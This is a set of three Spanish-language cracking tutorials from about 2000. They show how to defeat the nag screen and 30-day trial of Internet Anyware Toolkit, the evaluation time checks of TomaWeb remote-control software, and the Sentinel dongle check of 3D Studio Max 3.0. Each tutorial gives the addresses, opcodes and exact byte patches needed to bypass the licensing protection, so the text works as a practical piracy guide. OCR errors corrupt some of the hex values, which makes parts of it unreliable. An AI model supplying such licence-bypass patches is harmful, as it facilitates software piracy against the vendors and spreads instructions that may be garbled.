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Programa: Internet Anyware Toolkit v3.2.1 


PROTECCION: Serial, Nag, Limitacion de Tiempo 


Descripcion: Excelente Programa para realizar tareas de Hackers 
Dificultad: Principiante ++ 
DOWNLOAD : http: //www.tnsoft.com 


Herramientas: Softice 3x+ W32dasm Editor Hexadecimal 
CRACKER: karpoff FECHA: 30/07/2000 


| INTRODUCCION 


Tutorial de Crackeo Para Newbies desde Cero ik PROYECTO 18 HH 


Hola Newbies, como siempre estos manuales van dedicados a todos vosotros :) 


En esta ocasion jugaremos un poco con Internet Anyware Toolkit v3.2.1 , este programa 
es una excelente herramienta para empezar a hackear un poco tiene todo tipo de 
opciones, (Ping, Trace Routes, Scanear Puertos, Finger, Whols, Route Table y muchas 
mas opciones). 


la protección que tiene es un numero de serie, con una molesta nag de dialogo al 
arranque, y una limitación de 30 dias de uso. 


Que pretendo con este Manual ?? pues que aprendáis a tokitear el codigo de tal manera 
que se pueden hacer cosillas interesantes con la proteccion y obtener buenas Ideas a 
la hora de atakar otros programas mas complicados. 


AL ATAKE 


Por primera vez no me voy a perder en detalles del tipo de.... para buscar las strin ref. 
pulsamos el boton tal, para buscar una palabra.... pulsamos tal, creo que a estas alturas 
(Tutorial n* 18) todos sabeis de sobra manejar minimamente todas la herramientas y si tienes 
alguna duda consulta los manuales anteriores. 


Muy importante y siempre Lo primero de Todo, buena musica , paquete de tabaco, birras y 
demas enseres para entrar en trance "hooommmmmmmmmm" , vamos a Hacer una copia del 
ejecutable Toolkit.exe , y tenemos que obtener la maxima informacion sobre la victima para 
saber a que nos enfrentamos y no perder tiempo, a mi el File Analicer me dice esto. ( que no 
es poco :)) 


* File Analyzer Version DELUXE 

* Copyright (c) Vadim Tarasov ( 

* Homepage(1) - http://ww.world.lvu/unet 

* Homepage(2) - http://ww.fly.to/vadimlu 
Registered - karpoff 


TOOLKIT.ERXE 

Toolkit.exe 

933,888/D00E4000 € DOS >, 1,168/00000490 € HEADER > 

10:19:00 Jul, 26 of 2000 

PE-EXE. Win32 (WinHT and Win32s) portable executable file 

80386+ 

LINK - 6.0, 0S - 4.0, User - 0.0, Sybsystem - 4.0 

Windows GUI 

Image IsDLL (.) DebugStrip (.) IsExecutablet(x) 

RelocatStriptx) LineHumStriptx) LocSymbStriptx) 

32bit image (x) 16bit image (.) System file (.) 

0000000100001111 

Reserve - BO100000/00100000, Commit - 00001000/400001000 
InitDataSize : O009FODO, UninitDataSize : 00000000 

CodeSize 00045000, ImageSize := DODESO00 

LINK - 6.0, 0S - 4.0, User - 0.0, Sybsystem - 4.1 

Windows GUI 

Image IsDLL (.) DebugStrip (.) IsExecutablet(x) 

RelocatStrip(x) LineNumStriptx) LocSymbStripCx) 

32b1t image (x) 16bit image (.) System file (.) 

0000000100001111 

Reserve - D0100000/400100000, Commit - 00001000/00001000 

InitDataSize : O009FO00, UninitDataSize : 00000000 

CodeSize : 00045000, ImageSize = DONESO0O 

HeaderSize 00001000, OpHeaderSizetAHD: OOOOODEN 

BaselfCode : 00001000, BaselfData - 00046000 

Fileflignment: 00001000, Sectionflignment: 00001000 

Hame VirtSize ERVA PhysSize PhysOffs Flags 

text 00044101 /00001000/00045000/|00001000/|60000020 
.rdata DOOVESDA 00046000 |0000F000 ¡00046000 ¡40000040 
«data 00003308 |00055000/|00003000|00055000|C0000040 
.Psre 00088648 | 00059000 /|0008C000|00058000|40000040 


Processing file 
Large file name 
File sizes 
Created 

File structure 
Machine type 
Versions 
Subsystem 

Image Flags(1) 
Image Flags(2) 
Image Flags(3) 
Image Flags(bit) 
HeapStack 

Data Sizes 
Other Sizes(1) 
Versions 
Subsystem 

Image Flags(1) 
Image Flags(2) 
Image Flags(3) 
Image Flags(b1t) 


Other Sizes(1) 
Other Sizes(2) 


Processed with(1) 
DOSEXE part sizes: Header 64 bytes, image 1104 bytes, overlay 293272 bytes 
WINEXE part sizes: Header 4032 bytes, image 929856 bytes, overlay II bytes 
Entrypoint = DOS 64400000040, RUA 254312/0003E168, WIN 254312/0003E168 
Information(1) : Ouerlay start from 933888/D00£4000 

Extension ( 1): DOS executable file 


- Lo mas importante que no esta Empakado, que no esta Protegido contra desensamblado £ 
Debuger y que esta compilado con Visual C++ . Por lo tanto pasemos a desensamblar 
Toolkit.exe , el listado muerto lo guardamos como proyecto para evitar desensamblarlo 
nuevamente Cada vez que cerremos el desensamblador. 


- siguiente, Analicemos como se comporta el programa, osea que lo ejecutamos y nos fijamos 
bien en todas las caracteristicas, al arrancar aparece una nag de dialogo con las siguientes 
Caracteristicas: 


ES Thank-you for trying the Internet Anywhere Toolkit | 
| 


This is the 30 day trial version of the Internet Anywhere Toolkit. You may 
evaluate this product for 28 more days. 


Ifyou would like to enter a licence key for this program, please press the 
"Licence Now...” button. 


For more infomation on the Internet Anywhere Mail Server and other True 
North Software products and services, please visit our Web Site at 
http: 42. insoft.com 


Licence Now... | Later... [10 sec. ] | 


Como Caption (Titulo de la ventana) Welcome, un Icono, la bienvenida al programa las 
restricciones, y algo curioso el conteo de los dias de evaluacion, luego tenemos un boton con 
el texto Licence Now.. , que nos invita a meter el numero de registro, un segundo boton que 
pone Later..(15 sec) y que empieza una cuenta atras de 15 a 0 en medida de segundos, 
Adelanto que no vamos a ir a por el numero de serie ni a hacer un parcheo que nos acepte 
cualquier numero, vamos a jugar un poco con el codigo y se me ocurre manipular el codigo del 
boton que cuenta los segundos de tal manera que en vez de que tarde 15 segundos en iniciarse 
el programa alteremos el tiempo reduciendolo a lo minimo, asi cuando arranquemos el programa 
se abrira y se autocerrara en el acto la nag, entrando directamente al programa. 


- Este tipo de eventos es manejado por alguna funcion como settimer, Gettimer etc. y como en 
un programa hay cientos de eventos relacionados con el tiempo se me ocurre buscar la 
etiqueta de boton como Cadena de texto, osea Later.. (%D sec.) , asi que metemos en la 
opcion de busqueda del desensamblador la palabra Later y procedemos a su localizacion :), he 
encontrado 3 coincidencias pero me parece de especial interes esta, por estar junto a la 
funcion SetTimer. 


* Posible Reference to String Resource ID=01000: "User Tool 1" 
:00435BED 68E8030000 push 000003E8 

:00435BF2 6A01 push 00000001 

:00435BF4 51 push ecx 

:00435BF5 C744242000000000 mov [esp+20], 00000000 


* Reference To: USER32.SetTimer, Ord:0252h 
:00435BFD FF15FC6B4400 Call dword ptr [00446BFC] 
:00435C03 8B5664 mov edx, dword ptr [esi+64] 
:00435C06 8D442404 lea eax, dword ptr [esp+04] 
:00435C0A 52 push edx 


* Possible Reference to String Resource ID=00108: "Later... ( $1!d! sec. )" 


:00435C0B 6A6C push 0000006C 
:00435C0D 50 push eax 


- Bueno hemos localizado la Etiqueta del boton (Later... ( $1!d! sec. )"), y la funcion que 
maneja el evento de tiempo, ahora mis pobres conocimientos de programacion me dicen que el 
tiempo en programacion se utiliza en milisegundos osea 1000 = 1 segundo, se me ocurre 


localizar el contador que tiene que estar muy cerquita ya que tenmos la funcion SetTimer y 
la Etiqueta del Boton en este codigo, bueno pues busquemos 1000 en Hexadecimal que es 3E8, y 
como veis en el codigo que tenemos encima encontramos la coincidencia. 


* Possible Reference to String Resource ID=01000: "User Tool 1" 
:00435BED 68E8030000 push 000003E8 -- Medida en Milisegundos 
:00435BF2 6A01 push 00000001 

:00435BF4 51 push ecx 

:00435BF5 C744242000000000 mov [esp+20], 00000000 


Que creeis que puede pasar si en vez de que el contador se base en 1000 Mlsegundos para 
hacer un segundo, se base en Cero Mlsegundos :), Como hacer esto?? Pongamos el Push a Cero, 
cambiamos: 


:00435BED 68E8030000 push 000003E8 Por :00435BED 6A00909090 push 000000000 


Para realizar los cambios ya sabeis, localizar el offset de la linea a modificar, y con el 
Editor Hex parcheais. 


Hemos puesto como medida de tiempo 0 osea que ahora el programa hara 15 eventos de 0 tiempo, 
con lo cual el nag desaparecera nada mas iniciar el programa, tambien para seguir 


jugueteando podriamos manipular el manejador de 15 eventos y ponerlo a cero, si os apetece 
2... 


Quizas todo esto os parezca una tonteria, pero yo pienso que esta muy bien saber este tipo 
de cosillas, que nos pueden ser muy utiles con otros programas y esta muy bien jugar con el 
codigo para buscar diferentes formas de atakes, segun Juegas te vienen ideas a la cabeza hay 
que sentirse comodo con el codigo, obserbarlo, ver como funciona y experimentar. 


=-- A por el Nag --- 


Bueno ahora vamos a atkar al Nag directamente, segun he obserbado el codigo, estoy Casi 
seguro que evitando el inicio del Nag, evitaremos tambien que caduque el programa en 30 
dias, Como he llegado a esta conclusion ?? pues parece ser que tanto el codigo del Nag como 
el de la limitacion de tiempo estan asociados entre si, osea que si sale el nag, el programa 
cuenta los dias de evaluacion y si evitamos el nag, no cuenta nada, de todas maneras 
enseguida lo comprobaremos. 


Bueno Empecemos, localizaremos el codigo del nag mediante su Caption (Titulo) Welcome, 
Pulsemos la opcion de busqueda y metemos la palabra Welcome y veamos las coincidencias, 
enseguida nos aparece esta linea que es de lo mas interesante, 


Name: DialogID_00D2, + of Controls=005, Caption:"Welcome", ClassName:"" 


Suficiente para nosotros, tenemos que el Caption es manejado por el DialogID_00D2 que es el 
que lanzara el welcome, asi que a buscar el dialogo, realizamos la busqueda metiendo como 
busqueda DialogID_00D2 y enseguidita aterrizamos en: 


* Possible Reference to Dialog: DialogID_00D2 
:004358AF 68D2000000 push 000000D2 
:004358B4 89742410 mov dword ptr [esp+10], esi 


Cuando la ejecucion del programa llegue a esta parte del codigo, se empezara a crear el Nag 
y seguido lo lanzara, asi que a mi se me ocurre poner un punto de ruptura (break Point) un 
poco antes de estas lineas de codigo y analizar con softice o TRW2000 que instruccion lanza 
el Nag, bueno encima de este codigo tenemos lo siguiente: 


* Possible Reference to Dialog: DialogID_008E, CONTROL_ID:00FF, "JN " 
:00435890 GAFF push FFFFFFFF -- Pongamos un Brak Point aqui -- 
:00435892 6851434400 push 00444351 

:00435897 64A100000000 mov eax, dword ptr fs: [00000000] 

:0043589D 50 push eax 


Pues a lo dicho vamos a poner un Break Point en 00435890 para obserbar en que momento se 
lanza el Nag, Corremos Toolkit.exe y de inmediato entramos en softice en el bp que hemos 
puesto, vamos ejecutando el programa paso a paso con F10 hasta que nos salte el Nag , 
F10...F10..ETC. y splanch aparece nuestro nag, quien lo lanzo?? pues esactamente: 


* Reference To: MFC42.0Ordinal:09D2, Ord:09D2h 


:00427EDB E8266B0100 Call 0043EA06 --—- Lanza El Nag --- 
:00427EE0 83F801 cmp eax, 00000001 


T 


T 


:00427EE3 0F85A5000000 jne 00427F8E 
:00427EE9 8D8C24E8000000 lea ecx, dword ptr [esp+000000E8] 
:00427EF0 89BC24F4000000 mov dword ptr [esp+000000F4], edi 


T 


Vamos a buscar este codigo en el Listado muerto y veamos si hay alguna manera de evitar que 
pase por :00427EDB E8266B0100 Call 0043EA06 Lo mas interesante que aparece es el siguiente 
salto que va directo a la llamada que lanza el nag 


* Possible StringData Ref from Data Obj ->"Toolkit" 

:00427E94 6854574500 push 00455754 

:00427E99 E802B5FFFF call 004233A0 

:00427E9E 83C40C add esp, 0000000€C 

:00427EA1 3DCF070000 cmp eax, 000007CF 

:00427EA6 8D4C2440 lea ecx, dword ptr [esp+40] 

:00427EAA 742F je 00427EDB -- Directo a la Call que lanza el Nag -- 


* Reference To: MFC42.0Ordinal:09D2, Ord:09D2h 


:00427EAC E8556B0100 Call 0043EA06 -- OTro que tambien lanza el Nag -- 
:00427EB1 83F801 cmp eax, 00000001 

:00427EB4 0F858E000000 jne 00427F48 

:00427EBA 8D8C24E8000000 lea ecx, dword ptr [esp+000000E8] 

:00427EC1 C78424F400000002000000 mov dword ptr [esp+000000F4], 00000002 


Bueno Tenemos el salto 00427EAA je 00427EDB que si se ejecuta nos manda directos a la call 
que hemos localizado como responsable de que salga el Nag, comprobamos con softice y 
efectivamente cuando la ejecucion del programa llega a el salto este se ejecuta asta 
00427EDB Call 0043EA06 , pero supongo que estareis viendo y pensando lo mismo que yo, si 
anulamos el salto de tal manera que nunca se llegue a ejecutar no hacemos nada, por que con 
la primera instruccion que se encuentra es con otra llamada exacta a la que nos lanzo el nag 
, fijaros en las dos 


:00427EDB E8266B0100 Call 0043EA06 --- El call que lanza el nag --- 


:00427EAC E8556B0100 Call 0043EA06 --- Y este seguro que hace lo mismo, fijaros en la 
direccion a la que apunta , es la misma que el anterior, osea que con el salto que teniamos 
localizado no podemos hacer nada, ya que de cualquier forma, se ejecute o no.. van a ir a 
parar al mismo sitio, a presentarnos el nag de inicio, Entonces busquemos algo que pueda 
evitar las dos call, mirando un poco mas arriba tenemos un salto que si nos libra las dos 
instrucciones, 


* Possible StringData Ref from Data Obj ->"Toolkit" 


:00427E54 6854574500 push 00455754 

:00427E59 E8SC2B1FFFE call 00423020 

:00427E5E 83C410 add esp, 00000010 

:00427E61 3DCF070000 cmp eax, 000007CF 

:00427E66 BBO0O5000000 mov ebx, 00000005 

:00427E6B 0F845C010000 je 00427FCD -- Este mismo, sera el que nos ayude --— 
:00427E71 BF06000000 mov edi, 00000006 


Pues bueno solo tenemos que invertir el salto y ver los resultados, yo ya lo he probado con 
softice y es perfecto, bueno cojemos el Offset del salto y nos vamos a nuestro Editor Hex y 
procedemos a parchearlo de tal manera que quede asi 


:00427E6B 0F845C010000 je 00427FCD Cambiar Por 


:00427E6B 0F855C010000 jne 00427FCD 


y ya no tenemos ninguna nag molesta. 


Y que pasa con la limitacion de 30 Dias, Como ya comente antes , la Nag y Los dias de 
Evaluacion estan relacionados, si hay nag el programa va contando los dias, si no hay nag es 
lo mismo que si hubiesemos metido el numero de serie valido. 


Pues esto es todo, Creo que os sera interesante este Tutorial, o por lo menos eso espero. 
Cualquier duda, critica, sugerencias 
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| INTRODUCCION 


Al iniciarse la app principal se presenta una pantalla en la que los autores (TomaWeb 
Remote Control Software) agradecen el uso de esta versión de evaluación. Además se 
indican los días que quedan disponibles para continuar usando el software. 


Después de darle el clic al botón OK se muestra la pantalla 
principal y, en forma breve, otra en la que además de los créditos 
de los autores, se nos recuerda que esta versión es de Evaluación y 
nos indican el camino para hacer la compra correspondiente. 

Una vez que desaparece esta pantalla la app está disponible con 
todas sus opciones. 

Obviamente, al pasar de los días, una nueva instalación conservará 
el conteo de los que hayan transcurrido desde la primera 
instalación. 


Además existe el mensaje “Evaluation” en los tres ejecutables. 


AL ATAKE 


La forma de atacar la protección fue confirmar, en primer lugar, la presencia de la rutina 
comprobadora del tiempo transcurrido mediante el Softice (versión 4.05), luego seguirle la 
pista con el W32Dasm y, finalmente, hacer las modificaciones necesarias en el código 
mediante un Editor Hexadecimal. 


a) App Support Engineer: 


La bpx GetLocalTime muestra dos apariciones de esta rutina que anteceden a 
la de la ventana con los dias restantes: 00407B54 y 00407B80. Al usar el 
W32Dasm aparecieron tres lugares en que había referencia a la rutina: 
00405618, 00407B54 y  00407B80. 

Al retroceder a la dirección de llamada de la rutina y luego a la 
dirección de cada segmento de código correspondiente el resultado fue el 
siguiente: (la dirección entre paréntesis es la del inicio del trozo del 
código en el que está la llamada; los guiones significan que coincide con 
este inicio; la dirección que aparece a continuación de los dos puntos es 
la dirección desde la que se hace referencia al inicio anterior): 


405618  (-----=-=-=- ): 407B54 (407B4C): 407BAF (407BAC): 455ACB (455AA8): 452A04 
407B80 (407B78): 407BB9 (407BAC): 455ACB 


La primera dirección que muestra el W32Dasm presenta enseguida las otras 
dos que mostró el Softice; al seguirles su recorrido hacia atrás, ambas 
presentan una referencia común (455ACB) y ésta al llegar a su referencia 
(452A04) presenta el siguiente segmento de código: 


:004529F9 80BB9003000000 cmp byte ptr [ebx+00000390], 00 
:00452A00 7407 je 00452A09 

:00452A02 8BC3 mov eax, ebx 

:00452A04 E89F300000 call 00455AA8 


Por lo tanto, para eliminar el recorrido anterior y no Caer en el 
“control” de tiempo, bastará con saltarse el llamado que se ve en 00452A04 
y pasar directamente a la dirección 00452409. Para esto sólo se necesita 
modificar el salto condicional a esta última dirección por uno 
incondicional, cambiando la instrucción “7407 por EBO7. 


b) App Connection Wizzard: 


La situación es parecida a la anterior. Las direcciones de la rutina 
son: 0040564C 
00407D90 00407DBC. El seguimiento es el siguiente: 


40564C  (------ ): 407D90 (407D88): 407DEB (407DE8): 4471D6 
447200 
44 7DCF” (447DAC): 
444DEF 407DBC (407DB4): 407DF5 
(407DE8)... 


De las tres direcciones finales, las dos primeras se encuentran en 
segmentos de código que no muestran relación con el control de tiempo, 
mientras que la última lleva al segmento siguiente, semejante al de la 
aplicación anterior: 


:00444DE4 80BBF002000000 cmp byte ptr [ebx+000002F0], 00 
:00444DEB 7407 je 00444DF4 

:00444DED 8BC3 mov eax, ebx 

:00444DEF E8B82F0000 call 00447DAC 


Un razonamiento similar al anterior lleva a modificar el salto condicional 
a la dirección 444DF4 por uno incondicional, cambiando la instrucción “7407 
por EBO7. 


Cc) App Remote Host: 


Las direcciones de la rutina son: 004054BC, 00407900 y 0040792C. El 
seguimiento es: 


4054BC  (------ ): 407900 (4078F8): 40795B (407958): 443563 (443540): 442ED7 
40792C (407924): 407965 (407958) 


:00442ECC 80BB5C02000000 cmp byte ptr [ebx+0000025C], 00 
:00442ED3 7407 je 00442EDC 

:00442ED5 8BC3 mov eax, ebx 

:00442ED7 E864060000 call 00443540 


Al igual que en los casos anteriores, bastará con modificar el salto 
condicional a la dirección 442EDC por uno incondicional, cambiando la 
instrucción 7407 por EBO7. 

Una última modificación “cosmética” será eliminar el letrero Evaluation 
que se muestra en cada una de las aplicaciones anteriores. El editor 
hexadecimal HexWorkshop u otro semejante permite hacer esto sin problemas. 


por NickyAC 
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| INTRODUCCION 


E, este tutorial tratamos de nuevo las mochilas, el objetivo es el 3D Studio Max V3.0. He de decir que me ha 


defraudado bastante el sistema de protección, parece más una broma que no otra cosa. En menos de media hora 
puedes crackear el programa, es ridiculo, incluso he tardado mucho más en escribir este tutorial. Hasta se puede 
prescindir del Softlce para crackear el programa, con sólo usar el IDA y un poco de inteligencia habriamos llegado 
al crack final. Me parece patético.He encontrado muchas aplicaciones shareware mejor protegidas y además sin 
que estas utilizen ningún tipo de mochila. Esto me lleva a pensar el dinero que gastán en mochilas, para luego 
proteger de esta manera, es extraño que tan preocupados que son ellos para el dinero, no se den cuenta de como 
lo están tirando. Me sentiría muy avergonzado si malgastara mi dinero en un software que está protegido de tal 
manera y además resulta tan caro. 

De nuevo se demuestra que no importa lo caro que sea un programa, la vagancia de los programadores (en este 
caso de Autodesk) se pone de nuevo de manifiesto. A veces intento dar una explicación al porqué de estas 
inofensivas protecciones,quizas son las prisas por sacar cuanto antes una nueva versión, o quizas no protegen 
mejor para que su software sea crackeado rápidamente y se convierta así en el más utilizado (curiosa 
técnica de marketing), no se, no entiendo el porqué... sólo se que alguien dijo: es una mala protección, entonces es 
un mal programa. 


AL ATAKE 


Bueno primero vamos a utilizar el metodo del trazado a lo retro, si no sabes de que va, mirate mi tutorial génerico sobre 
mochilas. Antes de comenzar sería bueno desensamblar el ejecutable , yo le he intentado desensamblar con el W32Dasm 
pero no funciona (el programa se ejecuta sólo antes de desensamblarse, como es posible? ), de todas maneras no importa 
ya que siempre disponemos del IDA, que en estos casos nunca falla :). Pues nada desensamblamos el archivo y guardamos 
el resultado para su posterior uso. 

Luego ejecutaremos el 3DMax, nos aparece la pantalla de inicio y posteriormente un mensaje de error que dice algo así: 


* El bloqueo de hardware no está conectado o no es válido bla bla... ' 


Pulsa aceptar, bueno parece que no tenemos la mochila reglamentaria, pero esto tiene fácil solución, activamos el Softlce y 
pones un breakpoint sobre la funcion MessageBoxaA con: 


> BPX MessageBoxA 


- Ahora ejecutamos el 3DMax y veremos que el Softlce se activa antes de mostrar el cuadro de error, pulsamos F12 para ir a 
la linea de código donde se llamó a MessageBoxaA y veremos al así : 


0046977C loc_46977C: ; CODE XREF: sub_469610+155 j 
0046977C call sub_5C3910 
00469781 and eax, OFFFFh 
00469786 test eax, eax 
00469788 ¡z short loc_4697FA 
0046978A mov ecx, [esp+10h] 
0046978E dec ecx 

0046978F test ecx, ecx 
00469791 mov [esp+10h], ecx 
00469795 jg short loc_469742 
00469797 test eax, eax 
00469799 ¡z short loc_4697FA 
0046979B mov eax, dword_5F3740 
004697A0 test eax, eax 
004697A2 ¡z short loc_4697B5 
004697A4 push 1025h 
004697A9 call sub_414DA0 
004697AE push eax 
004697AF call ds:KillTimer 
004697B5 

004697B5 loc_4697B5: ; CODE XREF: sub_4697A2 
004697B5 xor ebx, ebx 
004697B7 call edi 

004697B9 mov eax, [eax] 
004697BB push OFFh 
004697C0 lea ecx, [esp+18h] 
004697C4 push ecx 
004697C5 push 2 

004697C7 push eax 
004697C8 call esi 

004697CA call edi 

004697CC mov eax, [eax] 
004697CE push OFFh 
004697D3 lea edx, [esp+118h] 
004697DA push edx 
004697DB push OEA81h 
004697E0 push eax 

004697E1 call esi 

004697E3 push 2010h 
004697E8 lea eax, [esp+18h] 
004697EC push eax 
004697ED lea ecx, [esp+11Ch] 
004697F4 push ecx 

004697F5 push ebx 


004697F6 call ebp -> Llama al cuadro de mensaje 

004697F8 ¡mp short loc_4697FE - -> y salta más abajo !! ESTAMOS AQUÍ !! 
004697FA loc_4697FA: ; CODE XREF: sub_469788 y sub_469799 
004697FA test ebx, ebx -> comprueba si EBX es 0 

004697FC ¡nz short loc_46980B  -> no, salta 

004697FE 


004697FE loc_4697FE: ; CODE XREF: sub_4697F8 


| 004697FE call sub_403A00 -> llamada a una función 
00469803 push O 
00469805 call ds:ExitProcess -> Sale del programa 
0046980B -> el siguiente código sólo se ejecuta si se salta desde 4697FC 
0046980B loc_46980B: ; CODE XREF: sub_4697FC 
0046980B pop esi 
0046980C pop ebp 
0046980D pop edi 
0046980E mov eax, ebx 
00469810 pop ebx 
00469811 add esp, 608h -> restaura la pila 
00469817 retn -> y continua el programa 
00469817 sub_469610 endp 


Bueno, examinando este código podemos comprobar como después de mostrar el mensaje de error, se nos desvia a 
mediante un salto incondicional a 4697FE, donde se termina la aplicación mediante la función del Kernel ExitProcess. Si 


miramos el código que nos ofrece el desensamblado del ejecutable, veremos que sólo hay dos maneras de esquivar la 

llamada a ExitProcess. La primera es pasar por el código en 4697FA, este código es referenciado por las líneas de código 

469788 y 469799 tal y como nos indica el IDA. La segunda la encontramos por debajo del salto incondicional en la línea de 

| código 469808 la cual es referenciada por la línea 4697FC.Esta última línea está por debajo de 4697FA, de lo cual se 
deduce que la única manera de esquivar el códigoque sale del programa es pasar por aquí. Como he dicho antes, la única 
manera de llegar aquí es mediante un salto en las lineas 469788 y 469799. Examinemos primero el salto en 469788 ya que 
es la primera referencia. 


0046977C call sub_5C3910 
00469781 and eax, OFFFFh 
00469786 test eax, eax 
00469788 jz short loc_4697FA 


Parece sospechoso, se llama a una función y posteriormente se borra el word alto EAX mediante el AND, y se comprueba si 
EAX es igual a O, si esto es así, se salta a la línea 4697FA, donde se encuentra nuestro test ebx,ebx. Probemos a invertir el 


salto y ver lo que sucede. Activemos el breakpoint a MessageBoxaA, pulsamos y para seguir, el breakpoint surte efecto, 
pulsamos F12 y aceptamos, de nuevo estamos en Softlce. Ponemos ahora un breakpoint sobre la linea 469788 con el 


siguiente comando del Softlce: 


> bpx 469788 


Desactivamos el bpx del MessageBoxA y pulsamos g para continuar el programa, este finalizará. Volvemos a ejecutarlo y 
estaremos de nuevo en Softlce, delante de la linea 469788. Ahora la modificaremos con el siguiente comando: 


> a 469788 
> ¡mp 4697FA 
> (pulsa enter y luego esc) 


| Puedes ver com ha cambiado el código, ahora pulsa y para ver lo que sucede... Magia el programa funciona !! 


| - Bueno, no te lo creas del todo, efectivamente el programa se inicia correctamente, puedes cargar y salvar archivos, pero... ¿ 
| Averigua lo que sucede después de que el programa este abierto durante cierto tiempo ? Pues lo que era de esperar, se 

| comprueba de nuevo la mochila, y se nos informa con otro mensaje de error. Podriamos actuar de la misma manera que lo 

| hemos hecho antes, pero se trata de variar un poco y aprender nuevas técnicas, o no? 

| Site fijas, veras que el programa siempre comprueba la mochila en el mismo intervalo de tiempo, vamos a medir este tiempo 
| aproximadamente. Coge un cronometro y conometra hasta que aparezca el mensaje de error, no ejecutes ninguna orden, 

| solo espera. 

| Después de aproximadamente 5 minutos aparecerá el mensaje de error. Si lo compruebas varias veces verás que el 

| intervalo de tiempo siempre es el mismo, aproximadamente 5 minutos. Por lo tanto es posible que el programa utilize un 
| temporizador que se active cada cinco minutos y compruebe la mochila. !! Lo cual quiere decir que si pudieramos 

| eliminar el temporizador, podriamos eliminar también la comprobación de la mochila e incluso hariamos que la aplicación se 
| ejecutará más deprisa !! .Vamos a comprobarlo, primero necesitamos saber que funciones hay en windows para crear 

| temporizadores. La única que yo conozco se llama SetTimer y tiene el siguiente formato: 


UINT SetTimer( 


HWND hWna, // handle de la ventana donde se enviaran los mensajes del temporizador 
UINT nIDEvent, // Identificador del temporizador 
UINT uElapse, // tiempo de espera en milisegundos 


| TIMERPROC IpTimerFunc  // dirección del proceso que el temporizador ejecutará al alcanzar el tiempo de 
espera 


); 


| Bueno lo más importante aquí es el tiempo de espera (uElapse), este valor se pasa como seguno parámetro, por lo tanto lo 
| encontraremos en la pila a partir de (esp->0xC), ya que los 2 argumentos + la dirección de retorno ocupan 4 bytes cada uno 
| (4*3=0xC). 

Teniendo en cuenta esto, en vez de poner un simple bpx SetTimer, utilizaremos un breakpoint condicional que sólo se 
| ejecutará cuando se intente crear un temporizador con el tiempo de espera que nosotros le especifiquemos. Como vamos a 
| buscar un temporizador que se active a los cinco minutos, deberemos convertir los minutos a milisegundos (5 minutos son 
| 60*5=300 segundos * 1000 = 300000) y el valor resultante a hexadecimal 3000000 en hexadecimal es 493E0. Por lo tanto el 
| breakpoint quedará: 


> bpx SetTimer if (esp->C)==493E0 


| Pues nada, entra en el Softlce y teclealo. Sal del Softlce y ejecuta el 3DMax, modifica el salto como hicimos previamente y 
| continua con pulsando g. Antes de que desaparezca la pantalla de inicio, veras que el breakpoint del SetTimer a surtido 
| efecto, pulsa F12 para ver el lugar desde donde se llamó y verás lo siguiente: 


004023A1 6A00 push 0 -> pasa NULL como función a ejecutar. 
00402343 68E0930400 push 493E0h -> Aquí estan los cinco minutos de espera !!! 
004023A8 6825100000 push 1025h -> Identificador 

004023AD 55 push ebp -> Handle de la ventana donde enviar mensajes 
004023AE 896804 mov [eax+4], ebp -> guarda handle de la ventana 


004023B1 FF1594755C00 call ds:SetTimer  -> establece el temporizador 
004023B7 8B0D40375F00 mov ecx, dword_5F3740 

004023BD 8B4108 mov eax, [ecx+8] 

004023C0 6800040000 push 400h 

004023C5 6870795E00 push 5E7970h 

004023CA 50 push eax 

004023CB 8944241C mov [esp+1Ch], eax 

004023CF E8EC280100 call sub_414CC0 

004023D4 8B54241C mov edx, [esp+1Ch] 


Como puedes comprobar se trata sin duda alguna de nuestra función. Ahora solo debemos pensar como hacer para eliminar 
el temporizador. Podemos sustituir por NOPs la llamada a SetTimer, pero tambien deberiamos de eliminar los 4 PUSH 
previos para no alterar el estado de la pila y provocar un posible cuelgue. Bien entonces vamos a hacer un resumen de los 
cambios necesarios, primero el salto en 469788, para averiguar el offset usaremos el IDA, nos colocaremos en la dirección 
469788 con el menu Navigate/jump to/Ask for Address e introduciremos 469788 luego iremos al menu Edit/Patch 
Program/Change Byte y allí se nos mostrará el offset del archivo que es 69788h (no cambies nada y pulsa cancel). 


Entonces en el offset 69788h encontraremos los bytes 7470 (que corresponden al salto jz short loc_4697FA) que 
cambiaremos por un salto incondicional (el opcode para un ¡mp es EB) por lo tanto quedará EB70. 


Y para el temporizador actuaremos de igual forma para los pushes y el call, quedando: 


Desde el offset 23A1h hasta el 23ADh sustituiremos todos los bytes por 90h (código del NOP) y 
desde el offset 23B1h hata el 23B6H sustituiremos todos los bytes por 90 (código del NOP). 


- Resumen: 
Offset: / Bytes originales / Sustituir por: 
23A1h  /6A 00 68 E0 93 040068 2510000055  /90 90 90 90 90 90 90 90 90 90 90 90 90 
23Bih /FF1594755C00 190 90 90 90 90 90 
69788H /7470 /EB 70 


Gracias a Alfredo10 por corregir un fallo tipográfico en el offset (parece ser que hay alguien que si lee esto, 
aunque sea por las malas :) ). 


- Bueno esto es todo para los que busquen un crack rápido, pero nuestro propósito es aprender un poquito más.Lo siguente 
es sólo necesario para los que esten interesados en conocer algunos trucos más. Sabemos que el 3DMax utiliza una mochila 
| tipo sentinel (mira en el CD y veras un archivo VXD con este nombre), vamos a utilizar otro de los metodos descritos en mi 
| tutorial genérico sobre mochilas, el metodo 4 (anticiparse a la carga del VXD). 


Utilizaremos el EXE sin modificar, por lo que si ya has modifcado el EXE, deberás recuperarlo. 


Borramos todos los breakpoints que tengamos y establecemos un BPX condicional para capturar la carga del controlador 
sentinel.vxd con el Softlce: 


> bpx CreateFileA if *(esp->4+4)=="SENT" 


el breakpoint surte efecto, estamos dentro de la función CreateFileA, comprobamos que efectivamente se va a cargar el 
driver sentinel.vxd con: 


> d *(esp+14) 


veremos SENTINEL.VXD en la ventana de datos del Softlce.Pulsamos F12 para ejecutar la función y volver al código que 
llama a CreateFileA, veremos algo así: 


005C3000 sub_5C3000 proc near ; C 

005C3000 push 0 // prepara parametros para CreateFileA 
005C3002 push O 

005C3004 push 3 

005C3006 push O 

005C3008 push O 

005C300A push O 

005C300C push 5C2FE0h // dirección de la cadena "W. ISENTINEL.VXD" 
005C3011 call j_CreateFileA // llama a CreateFileA 

005C3016 mov ecx, [esp+4] 

005C301A cmp eax, OFFFFFFFFh  // comprueba que se devuelve un handle correcto, eax debe de ser <> a - 
4 


005C301D mov [ecx], eax // guarda el handler en la posicon apuntada por ECX 
005C301F ¡nz short loc_5C3028  // salta si el handle es válido 

005C3021 mov ax, 1C0Bh // retorna un misterioso código de error 

005C3025 retn 4 1/ y retorna 

005C3028 

005C3028 loc_5C3028: ; CODE XREF: sub_5C3000+1F j 

